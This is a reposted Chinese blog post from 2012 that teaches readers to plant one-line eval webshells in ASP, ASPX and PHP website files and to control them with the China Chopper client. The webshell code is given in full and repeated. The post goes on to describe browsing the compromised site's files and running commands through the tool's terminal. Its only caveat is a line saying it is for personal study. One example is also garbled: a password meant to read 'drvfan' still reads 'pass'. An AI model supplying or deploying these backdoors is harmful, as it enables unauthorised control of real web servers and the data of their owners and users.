当前位置:首页 > 随笔 > 正文内容

一句话与中国菜刀的用法

光的传人13年前 (2012-11-15)随笔9553

 注:本文转载,仅用来个人学习。

菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp.php文件,这个asp.php文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的可以不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到菜刀主界面里,鼠标右击它,选择“文件管理”,就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

扫描二维码推送至手机访问。

版权声明:本文由光的传人博客www.liu16.com发布,如需转载请注明出处。

本文链接:http://www.liu16.com/post/maicaidao.html

标签: 黑客
分享给朋友:

相关文章

放开那个女孩-把井盖给我抬回去-霸气侧漏

放开那个女孩-把井盖给我抬回去-霸气侧漏

今天忽然想到了星哥的经典台词“放开那个女孩!”就突发奇想,查查看看有没有人搜!结果,竟然百度指数100多!我想,要是开一个名字叫“放开那个女孩”的博客,应该蛮不错的!只是想想罢了!有兴趣的朋友可以试一下!忽然思维又一转,“放开那个女孩”竟然...

VIP.VIP域名怎么样?肯定被预留了

VIP.VIP域名怎么样?肯定被预留了

说好的5.18凌晨1分钟开放的VIP域名注册呢?一个个都是骗人的!根本查询不到,全部都是查询超时,根本注册不了,只是给那些预定了vip域名的域名商们、米农们开后门罢了……域名商们的游戏,太无聊了!吹吹捧捧好几天,到实际行动上来没声了!不要说...

比特币疯涨突破1000美元,还会继续涨么?

比特币疯涨突破1000美元,还会继续涨么?

几天没关注比特币,没想到今天竟然突破了1000美元!太令人吃惊了!比特币暴涨后果是什么?我想,一切皆有可能!暴涨的代价是暴跌!前面的人赚的盆满体钵,后面的人必定亏得一下回到解放前!一种事物,超过了常理,就会越发不正常。我想,会不会导致世界经...

光的传人:防止原创文章被盗用的个人建议

光的传人:防止原创文章被盗用的个人建议

前两天心血来潮写的一篇原创文章:百度权重与谷歌PR值,到底谁的标准更科学呢?,在百度收录后,我才在前天,也就是15号下班前投稿到了站长之家上。晚上回家一看,审核通过,发表了!非常高兴!别的站长投稿的地方我没去过,我只在站长之家投稿,所以针对...

唐山打人案嫌犯均落网,反思:遇到此类事件你会怎么办?

唐山打人案嫌犯均落网,反思:遇到此类事件你会怎么办?

昨天晚上看过唐山烧烤店打人事件的监控视频,本博主也是无比的愤慨!骂“人”的话就不多说一些了,相信三观正常的人都看不下去这类事件,百度热门搜索也体现了此事件引起了最广大人民群众的愤怒:热搜前15条,唐山打人事件霸榜13条!!!很少有一个事件能...

移动CMCC就像是人生,方向调对了,速度唰唰的

移动CMCC就像是人生,方向调对了,速度唰唰的

移动CMCC网络(移动wlan),有时候真的很让人蛋疼,可有时候又会给人很大的惊喜!有的地方,有热点,下载速度能达到3M/s,亲身体验!这是多大的宽带?有的地方,信号不好,用电脑直接连接不上,就加了卡皇——信号增强器,另一个名字叫蹭网器。信...

评论列表

空气源
13年前 (2013-04-07)

php的不懂呀!路过支持一下呗

健康使者
13年前 (2012-12-20)

学习了

女装报告
13年前 (2012-12-11)

这是要教我们啥呀?

智能电网
13年前 (2012-12-06)

鸭梨山大,楼主这篇藐似没看懂

长安婚纱摄影
13年前 (2012-11-30)

鸭梨,太有才了!

南阳金巴黎婚纱摄影
13年前 (2012-11-24)

好,顶

奶茶
13年前 (2012-11-22)

菜刀不但是用来切菜还可以做其他很多东西。。。

wordpress博客主机
13年前 (2012-11-21)

学习了

霍致永博客
13年前 (2012-11-20)

这个标题太震撼啦哈哈欢迎来访

快播电影
13年前 (2012-11-20)

看不懂 PHP了,吐血了

李志红博客
13年前 (2012-11-19)

不是很懂,只来看看。

男装
13年前 (2012-11-19)

看了半天,因为不懂,所以还是没有看懂

比分直播
13年前 (2012-11-16)

来学习了,谢谢分享

润初颜
13年前 (2012-11-16)

php的不懂呀!路过支持一下

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。